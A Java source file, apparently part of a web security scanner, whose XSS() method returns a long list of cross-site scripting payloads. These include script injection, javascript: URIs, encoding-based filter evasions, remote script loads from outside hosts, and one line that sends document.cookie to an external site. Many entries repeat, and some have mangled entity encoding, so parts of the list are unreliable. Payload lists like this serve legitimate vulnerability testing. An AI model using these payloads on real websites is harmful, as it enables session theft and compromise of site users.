/*
 * To change this license header, choose License Headers in Project Properties.
 * To change this template file, choose Tools | Templates
 * and open the template in the editor.
 */
package payload;

import java.util.ArrayList;

/**
 *
 * @author Shaco JX
 */
public class A3p_8 {

    public ArrayList<String> XSS() {
        ArrayList<String> list = new ArrayList<>();
        String payload = "&lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;)&quot;\n"
                + "&lt;IFRAME SRC=http://ha.ckers.org/scriptlet.html &lt;\n"
                + "&lt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;);//&lt;&lt;/SCRIPT&gt;\n"
                + "&lt;IMG &quot;&quot;&quot;&gt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&quot;&gt;\n"
                + "&lt;SCRIPT&gt;a=/XSS/\n"
                + "&lt;SCRIPT a=&quot;&gt;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;\n"
                + "&lt;SCRIPT =&quot;blah&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;\n"
                + "&lt;SCRIPT a=&quot;blah&quot; &apos;&apos; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;\n"
                + "&lt;SCRIPT &quot;a=&apos;&gt;&apos;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;\n"
                + "&lt;SCRIPT a=`&gt;` SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;\n"
                + "&lt;SCRIPT&gt;document.write(&quot;&lt;SCRI&quot;);&lt;/SCRIPT&gt;PT SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;\n"
                + "&lt;SCRIPT a=&quot;>&apos;>&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;\n"
                + "&lt;A HREF=&quot;http://66.102.7.147/&quot;&gt;XSS&lt;/A&gt;\n"
                + "&lt;A HREF=&quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&quot;&gt;XSS&lt;/A&gt;\n"
                + "&lt;A HREF=&quot;http://1113982867/&quot;&gt;XSS&lt;/A&gt;\n"
                + "&lt;A HREF=&quot;http://0x42.0x0000066.0x7.0x93/&quot;&gt;XSS&lt;/A&gt;\n"
                + "&lt;A HREF=&quot;http://0102.0146.0007.00000223/&quot;&gt;XSS&lt;/A&gt;\n"
                + "&lt;A HREF=&quot;h&#x0A;tt&#09;p://6&amp;#09;6.000146.0x7.147/&quot;&gt;XSS&lt;/A&gt;\n"
                + "&lt;A HREF=&quot;//www.google.com/&quot;&gt;XSS&lt;/A&gt;\n"
                + "&lt;A HREF=&quot;//google&quot;&gt;XSS&lt;/A&gt;\n"
                + "&lt;A HREF=&quot;http://ha.ckers.org@google&quot;&gt;XSS&lt;/A&gt;\n"
                + "&lt;A HREF=&quot;http://google:ha.ckers.org&quot;&gt;XSS&lt;/A&gt;\n"
                + "&lt;A HREF=&quot;http://google.com/&quot;&gt;XSS&lt;/A&gt;\n"
                + "&lt;A HREF=&quot;http://www.google.com./&quot;&gt;XSS&lt;/A&gt;\n"
                + "&lt;A HREF=&quot;javascript:document.location=&apos;http://www.google.com/&apos;&quot;&gt;XSS&lt;/A&gt;\n"
                + "&lt;A HREF=&quot;http://www.gohttp://www.google.com/ogle.com/&quot;&gt;XSS&lt;/A&gt;\n"
                + "<script>document.vulnerable=true;</script>\n"
                + "<img SRC=\"jav ascript:document.vulnerable=true;\">\n"
                + "<img SRC=\"javascript:document.vulnerable=true;\">\n"
                + "<img SRC=\" &#14; javascript:document.vulnerable=true;\">\n"
                + "<body onload!#$%&()*~+-_.,:;?@[/|\\]^`=document.vulnerable=true;>\n"
                + "<<SCRIPT>document.vulnerable=true;//<</SCRIPT>\n"
                + "<script <B>document.vulnerable=true;</script>\n"
                + "<img SRC=\"javascript:document.vulnerable=true;\"\n"
                + "<iframe src=\"javascript:document.vulnerable=true; <\n"
                + "<script>a=/XSS/\\ndocument.vulnerable=true;</script>\n"
                + "\\\";document.vulnerable=true;;//\n"
                + "</title><SCRIPT>document.vulnerable=true;</script>\n"
                + "<input TYPE=\"IMAGE\" SRC=\"javascript:document.vulnerable=true;\">\n"
                + "<body BACKGROUND=\"javascript:document.vulnerable=true;\">\n"
                + "<body ONLOAD=document.vulnerable=true;>\n"
                + "<img DYNSRC=\"javascript:document.vulnerable=true;\">\n"
                + "<img LOWSRC=\"javascript:document.vulnerable=true;\">\n"
                + "<bgsound SRC=\"javascript:document.vulnerable=true;\">\n"
                + "<br SIZE=\"&{document.vulnerable=true}\">\n"
                + "<LAYER SRC=\"javascript:document.vulnerable=true;\"></LAYER>\n"
                + "<link REL=\"stylesheet\" HREF=\"javascript:document.vulnerable=true;\">\n"
                + "<style>li {list-style-image: url(\"javascript:document.vulnerable=true;\");</STYLE><UL><LI>XSS\n"
                + "<img SRC='vbscript:document.vulnerable=true;'>\n"
                + "1script3document.vulnerable=true;1/script3\n"
                + "<meta HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:document.vulnerable=true;\">\n"
                + "<meta HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:document.vulnerable=true;\">\n"
                + "<IFRAME SRC=\"javascript:document.vulnerable=true;\"></iframe>\n"
                + "<FRAMESET><FRAME SRC=\"javascript:document.vulnerable=true;\"></frameset>\n"
                + "<table BACKGROUND=\"javascript:document.vulnerable=true;\">\n"
                + "<table><TD BACKGROUND=\"javascript:document.vulnerable=true;\">\n"
                + "<div STYLE=\"background-image: url(javascript:document.vulnerable=true;)\">\n"
                + "<div STYLE=\"background-image: url(&#1;javascript:document.vulnerable=true;)\">\n"
                + "<div STYLE=\"width: expression(document.vulnerable=true);\">\n"
                + "<style>@im\\port'\\ja\\vasc\\ript:document.vulnerable=true';</style>\n"
                + "<img STYLE=\"xss:expr/*XSS*/ession(document.vulnerable=true)\">\n"
                + "<XSS STYLE=\"xss:expression(document.vulnerable=true)\">\n"
                + "exp/*<A STYLE='no\\xss:noxss(\"*//*\");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'>\n"
                + "<style TYPE=\"text/javascript\">document.vulnerable=true;</style>\n"
                + "<style>.XSS{background-image:url(\"javascript:document.vulnerable=true\");}</STYLE><A CLASS=XSS></a>\n"
                + "<style type=\"text/css\">BODY{background:url(\"javascript:document.vulnerable=true\")}</style>\n"
                + "<!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]-->\n"
                + "<base HREF=\"javascript:document.vulnerable=true;//\">\n"
                + "<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object>\n"
                + "<XML ID=I><X><C><![<IMG SRC=\"javas]]<![cript:document.vulnerable=true;\">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span>\n"
                + "<XML ID=\"xss\"><I><B><IMG SRC=\"javas<!-- -->cript:document.vulnerable=true\"></B></I></XML><SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></span>\n"
                + "<html><BODY><?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\"><?import namespace=\"t\" implementation=\"#default#time2\"><t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>\"></BODY></html>\n"
                + "<? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?>\n"
                + "<meta HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>document.vulnerable=true</SCRIPT>\">\n"
                + "<head><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-\n"
                + "<a href=\"javascript#document.vulnerable=true;\">\n"
                + "<div onmouseover=\"document.vulnerable=true;\">\n"
                + "<img src=\"javascript:document.vulnerable=true;\">\n"
                + "<img dynsrc=\"javascript:document.vulnerable=true;\">\n"
                + "<input type=\"image\" dynsrc=\"javascript:document.vulnerable=true;\">\n"
                + "<bgsound src=\"javascript:document.vulnerable=true;\">\n"
                + "&<script>document.vulnerable=true;</script>\n"
                + "&{document.vulnerable=true;};\n"
                + "<img src=&{document.vulnerable=true;};>\n"
                + "<link rel=\"stylesheet\" href=\"javascript:document.vulnerable=true;\">\n"
                + "<iframe src=\"vbscript:document.vulnerable=true;\">\n"
                + "<img src=\"mocha:document.vulnerable=true;\">\n"
                + "<img src=\"livescript:document.vulnerable=true;\">\n"
                + "<a href=\"about:<script>document.vulnerable=true;</script>\">\n"
                + "<meta http-equiv=\"refresh\" content=\"0;url=javascript:document.vulnerable=true;\">\n"
                + "<body onload=\"document.vulnerable=true;\">\n"
                + "<div style=\"background-image: url(javascript:document.vulnerable=true;);\">\n"
                + "<div style=\"behaviour: url([link to code]);\">\n"
                + "<div style=\"binding: url([link to code]);\">\n"
                + "<div style=\"width: expression(document.vulnerable=true;);\">\n"
                + "<style type=\"text/javascript\">document.vulnerable=true;</style>\n"
                + "<object classid=\"clsid:...\" codebase=\"javascript:document.vulnerable=true;\">\n"
                + "<style><!--</style><script>document.vulnerable=true;//--></script>\n"
                + "<<script>document.vulnerable=true;</script>\n"
                + "<![<!--]]<script>document.vulnerable=true;//--></script>\n"
                + "<!-- -- --><script>document.vulnerable=true;</script><!-- -- -->\n"
                + "<img src=\"blah\"onmouseover=\"document.vulnerable=true;\">\n"
                + "<img src=\"blah>\" onmouseover=\"document.vulnerable=true;\">\n"
                + "<xml src=\"javascript:document.vulnerable=true;\">\n"
                + "<xml id=\"X\"><a><b><script>document.vulnerable=true;</script>;</b></a></xml>\n"
                + "<div datafld=\"b\" dataformatas=\"html\" datasrc=\"#X\"></div>\n"
                + "[\\xC0][\\xBC]script>document.vulnerable=true;[\\xC0][\\xBC]/script>\n"
                + "<style>@import'http://www.securitycompass.com/xss.css';</style>\n"
                + "<meta HTTP-EQUIV=\"Link\" Content=\"<http://www.securitycompass.com/xss.css>; REL=stylesheet\">\n"
                + "<style>BODY{-moz-binding:url(\"http://www.securitycompass.com/xssmoz.xml#xss\")}</style>\n"
                + "<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://www.securitycompass.com/scriptlet.html\"></object>\n"
                + "<HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://www.securitycompass.com/xss.htc\"><xss:xss>XSS</xss:xss></html>\n"
                + "<script SRC=\"http://www.securitycompass.com/xss.jpg\"></script>\n"
                + "<!--#exec cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'\"-->\n"
                + "<script a=\">\" SRC=\"http://www.securitycompass.com/xss.js\"></script>\n"
                + "<script =\">\" SRC=\"http://www.securitycompass.com/xss.js\"></script>\n"
                + "<script a=\">\" '' SRC=\"http://www.securitycompass.com/xss.js\"></script>\n"
                + "<script \"a='>'\" SRC=\"http://www.securitycompass.com/xss.js\"></script>\n"
                + "<script a=`>` SRC=\"http://www.securitycompass.com/xss.js\"></script>\n"
                + "<script a=\">'>\" SRC=\"http://www.securitycompass.com/xss.js\"></script>\n"
                + "<script>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://www.securitycompass.com/xss.js\"></script>\n"
                + "<div style=\"binding: url(http://www.securitycompass.com/xss.js);\"> [Mozilla]\n"
                + "&quot;&gt;&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\\]^`=alert(&quot;XSS&quot;)&gt;\n"
                + "&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;\n"
                + "&lt;/br style=a:expression(alert())&gt;\n"
                + "&lt;scrscriptipt&gt;alert(1)&lt;/scrscriptipt&gt;\n"
                + "&lt;br size=\\&quot;&amp;{alert(&#039;XSS&#039;)}\\&quot;&gt;\n"
                + "perl -e &#039;print \\&quot;&lt;IMG SRC=java\\0script:alert(\\&quot;XSS\\&quot;)&gt;\\&quot;;&#039; &gt; out\n"
                + "perl -e &#039;print \\&quot;&lt;SCR\\0IPT&gt;alert(\\&quot;XSS\\&quot;)&lt;/SCR\\0IPT&gt;\\&quot;;&#039; &gt; out\n"
                + "<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>\n"
                + "<~/XSS/*-*/STYLE=xss:e/**/xpression(window.location=\"http://www.procheckup.com/?sid=\"%2bdocument.cookie)>\n"
                + "<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>\n"
                + "<~/XSS STYLE=xss:expression(alert('XSS'))>\n"
                + "\"><script>alert('XSS')</script>\n"
                + "</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>\n"
                + "XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>\n"
                + "XSS STYLE=xss:e/**/xpression(alert('XSS'))>\n"
                + "</XSS STYLE=xss:expression(alert('XSS'))>\n"
                + "';;alert(String.fromCharCode(88,83,83))//\\';;alert(String.fromCharCode(88,83,83))//\";;alert(String.fromCharCode(88,83,83))//\\\";;alert(String.fromCharCode(88,83,83))//-->;<;/SCRIPT>;\";>;';>;<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;\n"
                + "';';;!--\";<;XSS>;=&;{()}\n"
                + "<;SCRIPT>;alert(';XSS';)<;/SCRIPT>;\n"
                + "<;SCRIPT SRC=http://ha.ckers.org/xss.js>;<;/SCRIPT>;\n"
                + "<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;\n"
                + "<;BASE HREF=\";javascript:alert(';XSS';);//\";>;\n"
                + "<;BGSOUND SRC=\";javascript:alert(';XSS';);\";>;\n"
                + "<;BODY BACKGROUND=\";javascript:alert(';XSS';);\";>;\n"
                + "<;BODY ONLOAD=alert(';XSS';)>;\n"
                + "<;DIV STYLE=\";background-image: url(javascript:alert(';XSS';))\";>;\n"
                + "<;DIV STYLE=\";background-image: url(&;#1;javascript:alert(';XSS';))\";>;\n"
                + "<;DIV STYLE=\";width: expression(alert(';XSS';));\";>;\n"
                + "<;FRAMESET>;<;FRAME SRC=\";javascript:alert(';XSS';);\";>;<;/FRAMESET>;\n"
                + "<;IFRAME SRC=\";javascript:alert(';XSS';);\";>;<;/IFRAME>;\n"
                + "<;INPUT TYPE=\";IMAGE\"; SRC=\";javascript:alert(';XSS';);\";>;\n"
                + "<;IMG SRC=\";javascript:alert(';XSS';);\";>;\n"
                + "<;IMG SRC=javascript:alert(';XSS';)>;\n"
                + "<;IMG DYNSRC=\";javascript:alert(';XSS';);\";>;\n"
                + "<;IMG LOWSRC=\";javascript:alert(';XSS';);\";>;\n"
                + "<;IMG SRC=\";http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\";>;\n"
                + "Redirect 302 /a.jpg http://victimsite.com/admin.asp&;deleteuser\n"
                + "exp/*<;XSS STYLE=';no\\xss:noxss(\";*//*\";);\n"
                + "<;STYLE>;li {list-style-image: url(\";javascript:alert(&#39;XSS&#39;)\";);}<;/STYLE>;<;UL>;<;LI>;XSS\n"
                + "<;IMG SRC=';vbscript:msgbox(\";XSS\";)';>;\n"
                + "<;LAYER SRC=\";http://ha.ckers.org/scriptlet.html\";>;<;/LAYER>;\n"
                + "<;IMG SRC=\";livescript:[code]\";>;\n"
                + "%BCscript%BEalert(%A2XSS%A2)%BC/script%BE\n"
                + "<;META HTTP-EQUIV=\";refresh\"; CONTENT=\";0;url=javascript:alert(';XSS';);\";>;\n"
                + "<;META HTTP-EQUIV=\";refresh\"; CONTENT=\";0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\";>;\n"
                + "<;META HTTP-EQUIV=\";refresh\"; CONTENT=\";0; URL=http://;URL=javascript:alert(';XSS';);\";>;\n"
                + "<;IMG SRC=\";mocha:[code]\";>;\n"
                + "<;OBJECT TYPE=\";text/x-scriptlet\"; DATA=\";http://ha.ckers.org/scriptlet.html\";>;<;/OBJECT>;\n"
                + "<;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>;<;param name=url value=javascript:alert(';XSS';)>;<;/OBJECT>;\n"
                + "<;EMBED SRC=\";http://ha.ckers.org/xss.swf\"; AllowScriptAccess=\";always\";>;<;/EMBED>;\n"
                + "a=\";get\";;&;#10;b=\";URL(\";\";;&;#10;c=\";javascript:\";;&;#10;d=\";alert(';XSS';);\";)\";;&#10;eval(a+b+c+d);\n"
                + "<;STYLE TYPE=\";text/javascript\";>;alert(';XSS';);<;/STYLE>;\n"
                + "<;IMG STYLE=\";xss:expr/*XSS*/ession(alert(';XSS';))\";>;\n"
                + "<;XSS STYLE=\";xss:expression(alert(';XSS';))\";>;\n"
                + "<;STYLE>;.XSS{background-image:url(\";javascript:alert(';XSS';)\";);}<;/STYLE>;<;A CLASS=XSS>;<;/A>;\n"
                + "<;STYLE type=\";text/css\";>;BODY{background:url(\";javascript:alert(';XSS';)\";)}<;/STYLE>;\n"
                + "<;LINK REL=\";stylesheet\"; HREF=\";javascript:alert(';XSS';);\";>;\n"
                + "<;LINK REL=\";stylesheet\"; HREF=\";http://ha.ckers.org/xss.css\";>;\n"
                + "<;STYLE>;@import';http://ha.ckers.org/xss.css';;<;/STYLE>;\n"
                + "<;META HTTP-EQUIV=\";Link\"; Content=\";<;http://ha.ckers.org/xss.css>;; REL=stylesheet\";>;\n"
                + "<;STYLE>;BODY{-moz-binding:url(\";http://ha.ckers.org/xssmoz.xml#xss\";)}<;/STYLE>;\n"
                + "<;TABLE BACKGROUND=\";javascript:alert(';XSS';)\";>;<;/TABLE>;\n"
                + "<;TABLE>;<;TD BACKGROUND=\";javascript:alert(';XSS';)\";>;<;/TD>;<;/TABLE>;\n"
                + "<;HTML xmlns:xss>;\n"
                + "<;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=\";javas]]>;<;![CDATA[cript:alert(';XSS';);\";>;]]>;\n"
                + "<;XML ID=\";xss\";>;<;I>;<;B>;<;IMG SRC=\";javas<;!-- -->;cript:alert(';XSS';)\";>;<;/B>;<;/I>;<;/XML>;\n"
                + "<;XML SRC=\";http://ha.ckers.org/xsstest.xml\"; ID=I>;<;/XML>;\n"
                + "<;HTML>;<;BODY>;\n"
                + "<;!--[if gte IE 4]>;           \n"
                + "<;META HTTP-EQUIV=\";Set-Cookie\"; Content=\";USERID=<;SCRIPT>;alert(';XSS';)<;/SCRIPT>;\";>;\n"
                + "<;XSS STYLE=\";behavior: url(http://ha.ckers.org/xss.htc);\";>;\n"
                + "<;SCRIPT SRC=\";http://ha.ckers.org/xss.jpg\";>;<;/SCRIPT>;\n"
                + "<;!--#exec cmd=\";/bin/echo ';<;SCRIPT SRC';\";-->;<;!--#exec cmd=\";/bin/echo ';=http://ha.ckers.org/xss.js>;<;/SCRIPT>;';\";-->;\n"
                + "<;? echo(';<;SCR)';;\n"
                + "<;BR SIZE=\";&;{alert(';XSS';)}\";>;\n"
                + "<;IMG SRC=JaVaScRiPt:alert(';XSS';)>;\n"
                + "<;IMG SRC=javascript:alert(&;quot;XSS&;quot;)>;\n"
                + "<;IMG SRC=`javascript:alert(\";RSnake says, ';XSS';\";)`>;\n"
                + "<;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>;\n"
                + "<;IMG RC=&;#106;&;#97;&;#118;&;#97;&;#115;&;#99;&;#114;&;#105;&;#112;&;#116;&;#58;&;#97;&;#108;&;#101;&;#114;&;#116;&;#40;&;#39;&;#88;&;#83;&;#83;&;#39;&;#41;>;\n"
                + "<;IMG RC=&;#0000106&;#0000097&;#0000118&;#0000097&;#0000115&;#0000099&;#0000114&;#0000105&;#0000112&;#0000116&;#0000058&;#0000097&;#0000108&;#0000101&;#0000114&;#0000116&;#0000040&;#0000039&;#0000088&;#0000083&;#0000083&;#0000039&;#0000041>;\n"
                + "<;DIV STYLE=\";background-image:\\0075\\0072\\006C\\0028';\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028.1027\\0058.10530053\\0027\\0029';\\0029\";>;\n"
                + "<;IMG SRC=&;#x6A&;#x61&;#x76&;#x61&;#x73&;#x63&;#x72&;#x69&;#x70&;#x74&;#x3A&;#x61&;#x6C&;#x65&;#x72&;#x74&;#x28&;#x27&;#x58&;#x53&;#x53&;#x27&;#x29>;\n"
                + "<;HEAD>;<;META HTTP-EQUIV=\";CONTENT-TYPE\"; CONTENT=\";text/html; charset=UTF-7\";>; <;/HEAD>;+ADw-SCRIPT+AD4-alert(';XSS';);+ADw-/SCRIPT+AD4-\n"
                + "\\\";;alert(';XSS';);//\n"
                + "<;/TITLE>;<;SCRIPT>;alert(\"XSS\");<;/SCRIPT>;\n"
                + "<;STYLE>;@im\\port';\\ja\\vasc\\ript:alert(\";XSS\";)';;<;/STYLE>;\n"
                + "<;IMG SRC=\";jav&#x09;ascript:alert(';XSS';);\";>;\n"
                + "<;IMG SRC=\";jav&;#x09;ascript:alert(';XSS';);\";>;\n"
                + "<;IMG SRC=\";jav&;#x0A;ascript:alert(';XSS';);\";>;\n"
                + "<;IMG SRC=\";jav&;#x0D;ascript:alert(';XSS';);\";>;\n"
                + "<;IMG&#x0D;SRC&#x0D;=&#x0D;\";&#x0D;j&#x0D;a&#x0D;v&#x0D;a&#x0D;s&#x0D;c&#x0D;r&#x0D;i&#x0D;p&#x0D;t&#x0D;:&#x0D;a&#x0D;l&#x0D;e&#x0D;r&#x0D;t&#x0D;&#x0D;';&#x0D;X&#x0D;S&#x0D;S&#x0D;';&#x0D;)&#x0D;\";&#x0D;>;&#x0D;\n"
                + "perl -e ';print \";<;IM SRC=java\\0script:alert(\";XSS\";)>\";;';>; out\n"
                + "perl -e ';print \";&;<;SCR\\0IPT>;alert(\";XSS\";)<;/SCR\\0IPT>;\";;'; >; out\n"
                + "<;IMG SRC=\"; &;#14;  javascript:alert(';XSS';);\";>;\n"
                + "<;SCRIPT/XSS SRC=\";http://ha.ckers.org/xss.js\";>;<;/SCRIPT>;\n"
                + "<;BODY onload!#$%&;()*~+-_.,:;?@[/|\\]^`=alert(\";XSS\";)>;\n"
                + "<;SCRIPT SRC=http://ha.ckers.org/xss.js\n"
                + "<;SCRIPT SRC=//ha.ckers.org/.j>;\n"
                + "<;IMG SRC=\";javascript:alert(';XSS';)\";\n"
                + "<;IFRAME SRC=http://ha.ckers.org/scriptlet.html <;\n"
                + "<;<;SCRIPT>;alert(\";XSS\";);//<;<;/SCRIPT>;\n"
                + "<;IMG \";\";\";>;<;SCRIPT>;alert(\";XSS\";)<;/SCRIPT>;\";>;\n"
                + "<;SCRIPT>;a=/XSS/\n"
                + "<;SCRIPT a=\";>;\"; SRC=\";http://ha.ckers.org/xss.js\";>;<;/SCRIPT>;\n"
                + "<;SCRIPT =\";blah\"; SRC=\";http://ha.ckers.org/xss.js\";>;<;/SCRIPT>;\n"
                + "<;SCRIPT a=\";blah\"; ';'; SRC=\";http://ha.ckers.org/xss.js\";>;<;/SCRIPT>;\n"
                + "<;SCRIPT \";a=';>;';\"; SRC=\";http://ha.ckers.org/xss.js\";>;<;/SCRIPT>;\n"
                + "<;SCRIPT a=`>;` SRC=\";http://ha.ckers.org/xss.js\";>;<;/SCRIPT>;\n"
                + "<;SCRIPT>;document.write(\";<;SCRI\";);<;/SCRIPT>;PT SRC=\";http://ha.ckers.org/xss.js\";>;<;/SCRIPT>;\n"
                + "<;SCRIPT a=\";>';>\"; SRC=\";http://ha.ckers.org/xss.js\";>;<;/SCRIPT>;\n"
                + "<;A HREF=\";http://66.102.7.147/\";>;XSS<;/A>;\n"
                + "<;A HREF=\";http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\";>;XSS<;/A>;\n"
                + "<;A HREF=\";http://1113982867/\";>;XSS<;/A>;\n"
                + "<;A HREF=\";http://0x42.0x0000066.0x7.0x93/\";>;XSS<;/A>;\n"
                + "<;A HREF=\";http://0102.0146.0007.00000223/\";>;XSS<;/A>;\n"
                + "<;A HREF=\";h&#x0A;tt&#09;p://6&;#09;6.000146.0x7.147/\";>;XSS<;/A>;\n"
                + "<;A HREF=\";//www.google.com/\";>;XSS<;/A>;\n"
                + "<;A HREF=\";//google\";>;XSS<;/A>;\n"
                + "<;A HREF=\";http://ha.ckers.org@google\";>;XSS<;/A>;\n"
                + "<;A HREF=\";http://google:ha.ckers.org\";>;XSS<;/A>;\n"
                + "<;A HREF=\";http://google.com/\";>;XSS<;/A>;\n"
                + "<;A HREF=\";http://www.google.com./\";>;XSS<;/A>;\n"
                + "<;A HREF=\";javascript:document.location=';http://www.google.com/';\";>;XSS<;/A>;\n"
                + "<;A HREF=\";http://www.gohttp://www.google.com/ogle.com/\";>;XSS<;/A>;\n"
                + "<script>document.vulnerable=true;</script>\n"
                + "<img SRC=\"jav ascript:document.vulnerable=true;\">\n"
                + "<img SRC=\"javascript:document.vulnerable=true;\">\n"
                + "<img SRC=\" &#14; javascript:document.vulnerable=true;\">\n"
                + "<body onload!#$%&()*~+-_.,:;?@[/|\\]^`=document.vulnerable=true;>\n"
                + "<<SCRIPT>document.vulnerable=true;//<</SCRIPT>\n"
                + "<script <B>document.vulnerable=true;</script>\n"
                + "<img SRC=\"javascript:document.vulnerable=true;\"\n"
                + "<iframe src=\"javascript:document.vulnerable=true; <\n"
                + "<script>a=/XSS/\\ndocument.vulnerable=true;</script>\n"
                + "\\\";document.vulnerable=true;;//\n"
                + "</title><SCRIPT>document.vulnerable=true;</script>\n"
                + "<input TYPE=\"IMAGE\" SRC=\"javascript:document.vulnerable=true;\">\n"
                + "<body BACKGROUND=\"javascript:document.vulnerable=true;\">\n"
                + "<body ONLOAD=document.vulnerable=true;>\n"
                + "<img DYNSRC=\"javascript:document.vulnerable=true;\">\n"
                + "<img LOWSRC=\"javascript:document.vulnerable=true;\">\n"
                + "<bgsound SRC=\"javascript:document.vulnerable=true;\">\n"
                + "<br SIZE=\"&{document.vulnerable=true}\">\n"
                + "<LAYER SRC=\"javascript:document.vulnerable=true;\"></LAYER>\n"
                + "<link REL=\"stylesheet\" HREF=\"javascript:document.vulnerable=true;\">\n"
                + "<style>li {list-style-image: url(\"javascript:document.vulnerable=true;\");</STYLE><UL><LI>XSS\n"
                + "<img SRC='vbscript:document.vulnerable=true;'>\n"
                + "1script3document.vulnerable=true;1/script3\n"
                + "<meta HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:document.vulnerable=true;\">\n"
                + "<meta HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:document.vulnerable=true;\">\n"
                + "<IFRAME SRC=\"javascript:document.vulnerable=true;\"></iframe>\n"
                + "<FRAMESET><FRAME SRC=\"javascript:document.vulnerable=true;\"></frameset>\n"
                + "<table BACKGROUND=\"javascript:document.vulnerable=true;\">\n"
                + "<table><TD BACKGROUND=\"javascript:document.vulnerable=true;\">\n"
                + "<div STYLE=\"background-image: url(javascript:document.vulnerable=true;)\">\n"
                + "<div STYLE=\"background-image: url(&#1;javascript:document.vulnerable=true;)\">\n"
                + "<div STYLE=\"width: expression(document.vulnerable=true);\">\n"
                + "<style>@im\\port'\\ja\\vasc\\ript:document.vulnerable=true';</style>\n"
                + "<img STYLE=\"xss:expr/*XSS*/ession(document.vulnerable=true)\">\n"
                + "<XSS STYLE=\"xss:expression(document.vulnerable=true)\">\n"
                + "exp/*<A STYLE='no\\xss:noxss(\"*//*\");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'>\n"
                + "<style TYPE=\"text/javascript\">document.vulnerable=true;</style>\n"
                + "<style>.XSS{background-image:url(\"javascript:document.vulnerable=true\");}</STYLE><A CLASS=XSS></a>\n"
                + "<style type=\"text/css\">BODY{background:url(\"javascript:document.vulnerable=true\")}</style>\n"
                + "<!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]-->\n"
                + "<base HREF=\"javascript:document.vulnerable=true;//\">\n"
                + "<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object>\n"
                + "<XML ID=I><X><C><![<IMG SRC=\"javas]]<![cript:document.vulnerable=true;\">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span>\n"
                + "<XML ID=\"xss\"><I><B><IMG SRC=\"javas<!-- -->cript:document.vulnerable=true\"></B></I></XML><SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></span>\n"
                + "<html><BODY><?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\"><?import namespace=\"t\" implementation=\"#default#time2\"><t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>\"></BODY></html>\n"
                + "<? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?>\n"
                + "<meta HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>document.vulnerable=true</SCRIPT>\">\n"
                + "<head><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-\n"
                + "<a href=\"javascript#document.vulnerable=true;\">\n"
                + "<div onmouseover=\"document.vulnerable=true;\">\n"
                + "<img src=\"javascript:document.vulnerable=true;\">\n"
                + "<img dynsrc=\"javascript:document.vulnerable=true;\">\n"
